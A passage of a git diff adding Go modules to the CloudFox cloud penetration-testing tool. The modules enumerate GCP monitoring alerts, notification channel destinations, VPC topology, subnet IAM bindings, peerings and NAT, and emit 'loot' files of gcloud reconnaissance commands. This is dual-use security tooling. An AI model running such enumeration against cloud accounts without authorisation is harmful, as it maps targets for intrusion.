append(channelNames, name) + } else { + // Extract name from resource path if not found + parts := strings.Split(channelRef, "/") + if len(parts) > 0 { + channelNames = append(channelNames, parts[len(parts)-1]) + } + } + } + notificationChannelsStr := "-" + if len(channelNames) > 0 { + notificationChannelsStr = 
strings.Join(channelNames, ", ") + } + + // If policy has conditions, create one row per condition + if len(p.Conditions) > 0 { + for _, cond := range p.Conditions { + metricType := cond.MetricType + if metricType == "" { + metricType = "-" + } + comparison := cond.Comparison + if comparison == "" { + comparison = "-" + } + threshold := "-" + if cond.ThresholdValue != 0 { + threshold = fmt.Sprintf("%.2f", cond.ThresholdValue) + } + duration := cond.Duration + if duration == "" { + duration = "-" + } + + policiesBody = append(policiesBody, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.DisplayName, + boolToYesNo(p.Enabled), + cond.DisplayName, + metricType, + comparison, + threshold, + duration, + notificationChannelsStr, + }) + } + } else { + // Policy with no conditions - single row + policiesBody = append(policiesBody, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.DisplayName, + boolToYesNo(p.Enabled), + "-", + "-", + "-", + "-", + "-", + notificationChannelsStr, + }) + } + + // Add to loot + m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( + "## Policy: %s (Project: %s)\n"+ + "# Describe alert policy:\n"+ + "gcloud alpha monitoring policies describe %s --project=%s\n\n", + p.DisplayName, p.ProjectID, + extractResourceName(p.Name), p.ProjectID, + ) + } + + // Notification Channels table - with destination info + channelsHeader := []string{ + "Project Name", + "Project ID", + "Channel Name", + "Type", + "Enabled", + "Verified", + "Destination", + } + + var channelsBody [][]string + for _, c := range m.NotificationChannels { + // Extract destination from labels based on type + destination := extractChannelDestination(c.Type, c.Labels) + + channelsBody = append(channelsBody, []string{ + m.GetProjectName(c.ProjectID), + c.ProjectID, + c.DisplayName, + c.Type, + boolToYesNo(c.Enabled), + boolToYesNo(c.Verified), + destination, + }) + + // Add to loot + m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( + "## 
Channel: %s (Project: %s)\n"+ + "# Describe notification channel:\n"+ + "gcloud alpha monitoring channels describe %s --project=%s\n\n", + c.DisplayName, c.ProjectID, + extractResourceName(c.Name), c.ProjectID, + ) + } + + // Uptime Checks table - expanded + uptimeHeader := []string{ + "Project Name", + "Project ID", + "Check Name", + "Enabled", + "Host", + "Protocol", + "Port", + "Path", + "Period", + "Timeout", + "SSL Enabled", + } + + var uptimeBody [][]string + for _, u := range m.UptimeChecks { + host := u.MonitoredHost + if host == "" { + host = "-" + } + path := u.Path + if path == "" { + path = "-" + } + timeout := u.Timeout + if timeout == "" { + timeout = "-" + } + + uptimeBody = append(uptimeBody, []string{ + m.GetProjectName(u.ProjectID), + u.ProjectID, + u.DisplayName, + boolToYesNo(u.Enabled), + host, + u.Protocol, + fmt.Sprintf("%d", u.Port), + path, + u.Period, + timeout, + boolToYesNo(u.SSLEnabled), + }) + + // Add to loot + m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( + "## Uptime Check: %s (Project: %s)\n"+ + "# Describe uptime check:\n"+ + "gcloud alpha monitoring uptime describe %s --project=%s\n\n", + u.DisplayName, u.ProjectID, + extractResourceName(u.Name), u.ProjectID, + ) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + var tables []internal.TableFile + + if len(policiesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "alerting-policies", + Header: policiesHeader, + Body: policiesBody, + }) + } + + if len(channelsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "notification-channels", + Header: channelsHeader, + Body: channelsBody, + }) + } + + if len(uptimeBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "uptime-checks", + Header: 
uptimeHeader, + Body: uptimeBody, + }) + } + + output := MonitoringAlertsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names using project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// extractChannelDestination extracts the destination info from channel labels +func extractChannelDestination(channelType string, labels map[string]string) string { + if labels == nil { + return "-" + } + + switch channelType { + case "email": + if email, ok := labels["email_address"]; ok { + return email + } + case "slack": + if channel, ok := labels["channel_name"]; ok { + return channel + } + case "pagerduty": + if key, ok := labels["service_key"]; ok { + // Truncate service key for display + if len(key) > 12 { + return key[:12] + "..." 
+ } + return key + } + case "webhook_tokenauth", "webhook_basicauth": + if url, ok := labels["url"]; ok { + return url + } + case "pubsub": + if topic, ok := labels["topic"]; ok { + return topic + } + case "sms": + if number, ok := labels["number"]; ok { + return number + } + } + + // Try common label keys + for _, key := range []string{"url", "address", "endpoint", "target"} { + if val, ok := labels[key]; ok { + return val + } + } + + return "-" +} diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go new file mode 100644 index 00000000..dd28c62c --- /dev/null +++ b/gcp/commands/networktopology.go @@ -0,0 +1,869 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" +) + +// Module name constant +const GCP_NETWORKTOPOLOGY_MODULE_NAME string = "network-topology" + +var GCPNetworkTopologyCommand = &cobra.Command{ + Use: GCP_NETWORKTOPOLOGY_MODULE_NAME, + Aliases: []string{"topology", "network-map", "vpc-topology"}, + Short: "Visualize VPC network topology, peering relationships, and trust boundaries", + Long: `Analyze and visualize VPC network topology, peering relationships, and trust boundaries. 
+ +Features: +- Maps all VPC networks and their subnets +- Identifies VPC peering relationships +- Detects Shared VPC configurations +- Analyzes VPC Service Controls perimeters +- Maps Cloud NAT and Private Google Access +- Identifies potential trust boundary issues +- Detects cross-project network access paths + +Requires appropriate IAM permissions: +- roles/compute.networkViewer +- roles/compute.viewer`, + Run: runGCPNetworkTopologyCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type VPCNetwork struct { + Name string + ProjectID string + SelfLink string + Description string + RoutingMode string + AutoCreateSubnets bool + SubnetCount int + PeeringCount int + IsSharedVPC bool + SharedVPCRole string // "host" or "service" + SharedVPCHost string + MTU int64 + CreationTimestamp string + FirewallRuleCount int + PrivateGoogleAcces bool +} + +type Subnet struct { + Name string + ProjectID string + Network string + Region string + IPCIDRRange string + SecondaryRanges []string + PrivateIPGoogleAccess bool + FlowLogsEnabled bool + Purpose string + Role string + StackType string + IAMBindings []SubnetIAMBinding +} + +type SubnetIAMBinding struct { + Role string + Member string +} + +type VPCPeering struct { + Name string + Network string + PeerNetwork string + State string + StateDetails string + ExportCustomRoute bool + ImportCustomRoute bool + ExportSubnetRoute bool + ImportSubnetRoute bool + ProjectID string + PeerProjectID string + AutoCreateRoutes bool +} + +type SharedVPCConfig struct { + HostProject string + ServiceProjects []string + SharedSubnets []string + SharedNetworks []string +} + +type CloudNATConfig struct { + Name string + ProjectID string + Region string + Network string + Subnets []string + NATIPAddresses []string + MinPortsPerVM int64 + SourceSubnetworkType string + EnableLogging bool +} + + +type NetworkRoute struct { + Name string + ProjectID string + Network string + DestRange string + NextHop 
string + NextHopType string + Priority int64 + Tags []string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type NetworkTopologyModule struct { + gcpinternal.BaseGCPModule + + Networks []VPCNetwork + Subnets []Subnet + Peerings []VPCPeering + SharedVPCs map[string]*SharedVPCConfig + NATs []CloudNATConfig + Routes []NetworkRoute + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type NetworkTopologyOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o NetworkTopologyOutput) TableFiles() []internal.TableFile { return o.Table } +func (o NetworkTopologyOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPNetworkTopologyCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_NETWORKTOPOLOGY_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &NetworkTopologyModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Networks: []VPCNetwork{}, + Subnets: []Subnet{}, + Peerings: []VPCPeering{}, + SharedVPCs: make(map[string]*SharedVPCConfig), + NATs: []CloudNATConfig{}, + Routes: []NetworkRoute{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *NetworkTopologyModule) Execute(ctx context.Context, logger internal.Logger) { + // Create Compute client + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + return + } 
+ + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, logger) + }(projectID) + } + wg.Wait() + + // Check results + if len(m.Networks) == 0 { + logger.InfoM("No VPC networks found", GCP_NETWORKTOPOLOGY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d Cloud NAT(s)", + len(m.Networks), len(m.Subnets), len(m.Peerings), len(m.NATs)), GCP_NETWORKTOPOLOGY_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *NetworkTopologyModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating networks for project: %s", projectID), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } + + // List networks + m.enumerateNetworks(ctx, projectID, computeService, logger) + + // List subnets + m.enumerateSubnets(ctx, projectID, computeService, logger) + + // List routes + m.enumerateRoutes(ctx, projectID, computeService, logger) + + // List Cloud NAT + m.enumerateCloudNAT(ctx, projectID, computeService, logger) +} + +func (m *NetworkTopologyModule) enumerateNetworks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Networks.List(projectID) + err := req.Pages(ctx, func(page *compute.NetworkList) error { + for _, network := range page.Items { + vpc := VPCNetwork{ + Name: network.Name, + ProjectID: projectID, + SelfLink: network.SelfLink, + Description: network.Description, + RoutingMode: network.RoutingConfig.RoutingMode, + AutoCreateSubnets: network.AutoCreateSubnetworks, + MTU: network.Mtu, + CreationTimestamp: network.CreationTimestamp, + SubnetCount: 
len(network.Subnetworks), + } + + // Check for peerings + for _, peering := range network.Peerings { + vpc.PeeringCount++ + + peeringRecord := VPCPeering{ + Name: peering.Name, + Network: network.SelfLink, + PeerNetwork: peering.Network, + State: peering.State, + StateDetails: peering.StateDetails, + ExportCustomRoute: peering.ExportCustomRoutes, + ImportCustomRoute: peering.ImportCustomRoutes, + ExportSubnetRoute: peering.ExportSubnetRoutesWithPublicIp, + ImportSubnetRoute: peering.ImportSubnetRoutesWithPublicIp, + ProjectID: projectID, + AutoCreateRoutes: peering.AutoCreateRoutes, + } + + // Extract peer project ID from peer network URL + peeringRecord.PeerProjectID = m.extractProjectFromURL(peering.Network) + + m.mu.Lock() + m.Peerings = append(m.Peerings, peeringRecord) + m.mu.Unlock() + } + + m.mu.Lock() + m.Networks = append(m.Networks, vpc) + m.mu.Unlock() + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list networks in project %s", projectID)) + } + + // Check for Shared VPC host project + m.checkSharedVPCHost(ctx, projectID, computeService, logger) +} + +func (m *NetworkTopologyModule) enumerateSubnets(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Subnetworks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for region, subnetList := range page.Items { + if subnetList.Subnetworks == nil { + continue + } + regionName := m.extractRegionFromURL(region) + for _, subnet := range subnetList.Subnetworks { + subnetRecord := Subnet{ + Name: subnet.Name, + ProjectID: projectID, + Network: subnet.Network, + Region: regionName, + IPCIDRRange: subnet.IpCidrRange, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + Role: subnet.Role, + StackType: subnet.StackType, + } + + // Check for flow 
// logs (continuation): record whether VPC Flow Logs are enabled for the subnet.
				if subnet.LogConfig != nil {
					subnetRecord.FlowLogsEnabled = subnet.LogConfig.Enable
				}

				// Secondary ranges, recorded as "name:CIDR" strings
				for _, sr := range subnet.SecondaryIpRanges {
					subnetRecord.SecondaryRanges = append(subnetRecord.SecondaryRanges,
						fmt.Sprintf("%s:%s", sr.RangeName, sr.IpCidrRange))
				}

				// Get IAM bindings for the subnet
				subnetRecord.IAMBindings = m.getSubnetIAMBindings(ctx, computeService, projectID, regionName, subnet.Name)

				m.mu.Lock()
				m.Subnets = append(m.Subnets, subnetRecord)
				m.mu.Unlock()
			}
		}
		return nil
	})

	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME,
			fmt.Sprintf("Could not list subnets in project %s", projectID))
	}
}

// getSubnetIAMBindings retrieves IAM bindings for a subnet. Errors (e.g.
// missing permission) are treated as "no bindings" and yield nil.
func (m *NetworkTopologyModule) getSubnetIAMBindings(ctx context.Context, computeService *compute.Service, projectID, region, subnetName string) []SubnetIAMBinding {
	policy, err := computeService.Subnetworks.GetIamPolicy(projectID, region, subnetName).Context(ctx).Do()
	if err != nil {
		return nil
	}

	var bindings []SubnetIAMBinding
	for _, binding := range policy.Bindings {
		if binding == nil {
			continue
		}
		// Flatten the policy: one record per (role, member) pair.
		for _, member := range binding.Members {
			bindings = append(bindings, SubnetIAMBinding{
				Role:   binding.Role,
				Member: member,
			})
		}
	}
	return bindings
}

// enumerateRoutes lists routes in the project and classifies each route's
// next hop into one of: gateway, instance, ip, network, peering, ilb, vpn.
func (m *NetworkTopologyModule) enumerateRoutes(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) {
	req := computeService.Routes.List(projectID)
	err := req.Pages(ctx, func(page *compute.RouteList) error {
		for _, route := range page.Items {
			routeRecord := NetworkRoute{
				Name:      route.Name,
				ProjectID: projectID,
				Network:   route.Network,
				DestRange: route.DestRange,
				Priority:  route.Priority,
				Tags:      route.Tags,
			}

			// Determine next hop type from whichever NextHop* field is set
			switch {
			case route.NextHopGateway != "":
				routeRecord.NextHopType = "gateway"
				routeRecord.NextHop = route.NextHopGateway
			case route.NextHopInstance != "":
				routeRecord.NextHopType = "instance"
				routeRecord.NextHop = route.NextHopInstance
			case route.NextHopIp != "":
				routeRecord.NextHopType = "ip"
				routeRecord.NextHop = route.NextHopIp
			case route.NextHopNetwork != "":
				routeRecord.NextHopType = "network"
				routeRecord.NextHop = route.NextHopNetwork
			case route.NextHopPeering != "":
				routeRecord.NextHopType = "peering"
				routeRecord.NextHop = route.NextHopPeering
			case route.NextHopIlb != "":
				routeRecord.NextHopType = "ilb"
				routeRecord.NextHop = route.NextHopIlb
			case route.NextHopVpnTunnel != "":
				routeRecord.NextHopType = "vpn"
				routeRecord.NextHop = route.NextHopVpnTunnel
			}

			m.mu.Lock()
			m.Routes = append(m.Routes, routeRecord)
			m.mu.Unlock()
		}
		return nil
	})

	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME,
			fmt.Sprintf("Could not list routes in project %s", projectID))
	}
}

// enumerateCloudNAT walks Cloud Routers (aggregated across regions) to
// collect NAT gateway configurations.
func (m *NetworkTopologyModule) enumerateCloudNAT(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) {
	// List routers to find NAT configurations
	req := computeService.Routers.AggregatedList(projectID)
	err := req.Pages(ctx, func(page *compute.RouterAggregatedList) error {
		for region, routerList := range page.Items {
			if routerList.Routers == nil {
				continue
			}
			for _, router := range routerList.Routers {
				for _, nat := range router.Nats {
					natRecord := CloudNATConfig{
						Name:                 nat.Name,
						ProjectID:            projectID,
						Region:               m.extractRegionFromURL(region),
						Network:              router.Network,
						MinPortsPerVM:        nat.MinPortsPerVm,
						SourceSubnetworkType: nat.SourceSubnetworkIpRangesToNat,
					}

					// NAT IP addresses
					for _, natIP := range nat.NatIps {
						natRecord.NATIPAddresses = append(natRecord.NATIPAddresses, natIP)
					}

					// Subnets using this NAT
					for _, subnet := range nat.Subnetworks {
						natRecord.Subnets =
append(natRecord.Subnets, subnet.Name)
					}

					// Logging
					if nat.LogConfig != nil {
						natRecord.EnableLogging = nat.LogConfig.Enable
					}

					m.mu.Lock()
					m.NATs = append(m.NATs, natRecord)
					m.mu.Unlock()
				}
			}
		}
		return nil
	})

	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME,
			fmt.Sprintf("Could not list Cloud NAT in project %s", projectID))
	}
}

// checkSharedVPCHost records Shared VPC (XPN) host status for the project:
// when the project is a host, it captures the attached service projects and
// tags the project's networks as Shared VPC host networks.
//
// FIX: the original (a) called Projects.Get without the request context,
// inconsistent with every other API call in this file, and (b) scanned and
// mutated m.Networks without holding m.mu while the other per-project
// goroutines may still be appending to it — a data race.
func (m *NetworkTopologyModule) checkSharedVPCHost(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) {
	// Check if project is a Shared VPC host
	project, err := computeService.Projects.Get(projectID).Context(ctx).Do()
	if err != nil {
		// Best-effort check; failure to read the project is not fatal here.
		return
	}

	if project.XpnProjectStatus == "HOST" {
		m.mu.Lock()
		m.SharedVPCs[projectID] = &SharedVPCConfig{
			HostProject:     projectID,
			ServiceProjects: []string{},
			SharedSubnets:   []string{},
			SharedNetworks:  []string{},
		}
		m.mu.Unlock()

		// List service projects attached to this host
		xpnReq := computeService.Projects.GetXpnResources(projectID)
		err := xpnReq.Pages(ctx, func(page *compute.ProjectsGetXpnResources) error {
			for _, resource := range page.Resources {
				if resource.Type == "PROJECT" {
					m.mu.Lock()
					m.SharedVPCs[projectID].ServiceProjects = append(
						m.SharedVPCs[projectID].ServiceProjects, resource.Id)
					m.mu.Unlock()
				}
			}
			return nil
		})
		if err != nil {
			m.CommandCounter.Error++
			gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME,
				fmt.Sprintf("Could not list XPN resources in project %s", projectID))
		}

		// Mark host networks. Other project goroutines may still be appending
		// to m.Networks, so the scan must happen under the lock.
		m.mu.Lock()
		for i := range m.Networks {
			if m.Networks[i].ProjectID == projectID {
				m.Networks[i].IsSharedVPC = true
				m.Networks[i].SharedVPCRole = "host"
			}
		}
		m.mu.Unlock()
	}
}

// ------------------------------
// Helper Functions
// ------------------------------
func (m *NetworkTopologyModule) extractProjectFromURL(url string) string {
	// Format:
// https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}
	if strings.Contains(url, "projects/") {
		parts := strings.Split(url, "/")
		for i, part := range parts {
			if part == "projects" && i+1 < len(parts) {
				return parts[i+1]
			}
		}
	}
	// Not a project-scoped URL.
	return ""
}

// extractNetworkName returns the trailing path segment of a full self-link URL.
func (m *NetworkTopologyModule) extractNetworkName(url string) string {
	// Extract network name from full URL
	parts := strings.Split(url, "/")
	if len(parts) > 0 {
		return parts[len(parts)-1]
	}
	return url
}

// extractRegionFromURL pulls the region segment out of a URL or aggregated-list
// key such as "regions/us-central1"; returns the input unchanged if absent.
func (m *NetworkTopologyModule) extractRegionFromURL(url string) string {
	// Extract region from URL like regions/us-central1
	if strings.Contains(url, "regions/") {
		parts := strings.Split(url, "/")
		for i, part := range parts {
			if part == "regions" && i+1 < len(parts) {
				return parts[i+1]
			}
		}
	}
	return url
}

// ------------------------------
// Loot File Management
// ------------------------------

// initializeLootFiles seeds the loot map with a header-only commands file;
// the output stage skips it if nothing is appended beyond the header.
func (m *NetworkTopologyModule) initializeLootFiles() {
	m.LootMap["network-topology-commands"] = &internal.LootFile{
		Name:     "network-topology-commands",
		Contents: "# Network Topology Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n",
	}
}

// ------------------------------
// Output Generation
// ------------------------------

// writeOutput renders the collected topology into tables and loot files.
// It runs after all project goroutines have completed (Execute waits on the
// WaitGroup first), so the collections are read without locking.
func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal.Logger) {
	// Sort networks by project and name
	sort.Slice(m.Networks, func(i, j int) bool {
		if m.Networks[i].ProjectID != m.Networks[j].ProjectID {
			return m.Networks[i].ProjectID < m.Networks[j].ProjectID
		}
		return m.Networks[i].Name < m.Networks[j].Name
	})

	// VPC Networks table
	networksHeader := []string{
		"Project Name",
		"Project ID",
		"Network",
		"Routing Mode",
		"Subnets",
		"Peerings",
		"Shared VPC",
		"MTU",
	}

	var networksBody [][]string
	for _, n := range m.Networks {
		sharedVPC := "-"
		if n.IsSharedVPC {
			sharedVPC = n.SharedVPCRole
		}

		networksBody =
append(networksBody, []string{ + m.GetProjectName(n.ProjectID), + n.ProjectID, + n.Name, + n.RoutingMode, + fmt.Sprintf("%d", n.SubnetCount), + fmt.Sprintf("%d", n.PeeringCount), + sharedVPC, + fmt.Sprintf("%d", n.MTU), + }) + + // Add network commands to loot + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## VPC Network: %s (Project: %s)\n"+ + "# Describe network:\n"+ + "gcloud compute networks describe %s --project=%s\n\n"+ + "# List subnets in network:\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ + "# List firewall rules for network:\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", + n.Name, n.ProjectID, + n.Name, n.ProjectID, + n.Name, n.ProjectID, + n.Name, n.ProjectID, + ) + } + + // Subnets table - one row per IAM binding if present, otherwise one row per subnet + subnetsHeader := []string{ + "Project Name", + "Project ID", + "Subnet", + "Network", + "Region", + "CIDR", + "Private Google Access", + "Flow Logs", + "Purpose", + "IAM Role", + "IAM Member", + } + + var subnetsBody [][]string + for _, s := range m.Subnets { + purpose := s.Purpose + if purpose == "" { + purpose = "PRIVATE" + } + + if len(s.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range s.IAMBindings { + subnetsBody = append(subnetsBody, []string{ + m.GetProjectName(s.ProjectID), + s.ProjectID, + s.Name, + m.extractNetworkName(s.Network), + s.Region, + s.IPCIDRRange, + boolToYesNo(s.PrivateIPGoogleAccess), + boolToYesNo(s.FlowLogsEnabled), + purpose, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row + subnetsBody = append(subnetsBody, []string{ + m.GetProjectName(s.ProjectID), + s.ProjectID, + s.Name, + m.extractNetworkName(s.Network), + s.Region, + s.IPCIDRRange, + boolToYesNo(s.PrivateIPGoogleAccess), + boolToYesNo(s.FlowLogsEnabled), + purpose, + "-", + "-", + }) + } + + // Add subnet commands to loot + 
m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## Subnet: %s (Project: %s, Region: %s)\n"+ + "# Describe subnet:\n"+ + "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n"+ + "# Get subnet IAM policy:\n"+ + "gcloud compute networks subnets get-iam-policy %s --region=%s --project=%s\n\n", + s.Name, s.ProjectID, s.Region, + s.Name, s.Region, s.ProjectID, + s.Name, s.Region, s.ProjectID, + ) + } + + // VPC Peerings table + peeringsHeader := []string{ + "Project Name", + "Project ID", + "Name", + "Local Network", + "Peer Network", + "Peer Project", + "State", + "Import Routes", + "Export Routes", + } + + var peeringsBody [][]string + for _, p := range m.Peerings { + peeringsBody = append(peeringsBody, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.Name, + m.extractNetworkName(p.Network), + m.extractNetworkName(p.PeerNetwork), + p.PeerProjectID, + p.State, + boolToYesNo(p.ImportCustomRoute), + boolToYesNo(p.ExportCustomRoute), + }) + + // Add peering commands to loot + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## VPC Peering: %s (Project: %s)\n"+ + "# Local: %s -> Peer: %s (project: %s)\n"+ + "# List peerings:\n"+ + "gcloud compute networks peerings list --project=%s\n\n"+ + "# List peering routes (incoming):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=INCOMING\n\n"+ + "# List peering routes (outgoing):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=OUTGOING\n\n", + p.Name, p.ProjectID, + m.extractNetworkName(p.Network), m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, + p.ProjectID, + p.Name, p.ProjectID, m.extractNetworkName(p.Network), + p.Name, p.ProjectID, m.extractNetworkName(p.Network), + ) + } + + // Cloud NAT table + natHeader := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Network", + "NAT IPs", + "Logging", + } + + var 
natBody [][]string + for _, nat := range m.NATs { + natIPs := strings.Join(nat.NATIPAddresses, ", ") + if natIPs == "" { + natIPs = "AUTO" + } + + natBody = append(natBody, []string{ + m.GetProjectName(nat.ProjectID), + nat.ProjectID, + nat.Name, + nat.Region, + m.extractNetworkName(nat.Network), + natIPs, + boolToYesNo(nat.EnableLogging), + }) + + // Add NAT commands to loot + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## Cloud NAT: %s (Project: %s, Region: %s)\n"+ + "# Describe router with NAT config:\n"+ + "gcloud compute routers describe ROUTER_NAME --region=%s --project=%s\n\n"+ + "# List NAT mappings:\n"+ + "gcloud compute routers get-nat-mapping-info ROUTER_NAME --region=%s --project=%s\n\n", + nat.Name, nat.ProjectID, nat.Region, + nat.Region, nat.ProjectID, + nat.Region, nat.ProjectID, + ) + } + + // Add Shared VPC commands to loot + for hostProject, config := range m.SharedVPCs { + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## Shared VPC Host: %s\n"+ + "# Service Projects: %v\n"+ + "# List Shared VPC resources:\n"+ + "gcloud compute shared-vpc list-associated-resources %s\n\n"+ + "# Get host project for service project:\n"+ + "gcloud compute shared-vpc get-host-project SERVICE_PROJECT_ID\n\n"+ + "# List usable subnets for service project:\n"+ + "gcloud compute networks subnets list-usable --project=%s\n\n", + hostProject, + config.ServiceProjects, + hostProject, + hostProject, + ) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "vpc-networks", + Header: networksHeader, + Body: networksBody, + }, + } + + if len(subnetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "subnets", + Header: subnetsHeader, + Body: 
subnetsBody, + }) + } + + if len(peeringsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-peerings", + Header: peeringsHeader, + Body: peeringsBody, + }) + } + + if len(natBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloud-nat", + Header: natHeader, + Body: natBody, + }) + } + + output := NetworkTopologyOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go new file mode 100644 index 00000000..4f04070a --- /dev/null +++ b/gcp/commands/notebooks.go @@ -0,0 +1,290 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + notebooksservice "github.com/BishopFox/cloudfox/gcp/services/notebooksService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPNotebooksCommand = &cobra.Command{ + Use: globals.GCP_NOTEBOOKS_MODULE_NAME, + Aliases: []string{"nb", "jupyter", "workbench"}, + Short: "Enumerate Vertex AI Workbench notebooks", + Long: `Enumerate Vertex AI Workbench and legacy notebook instances. 
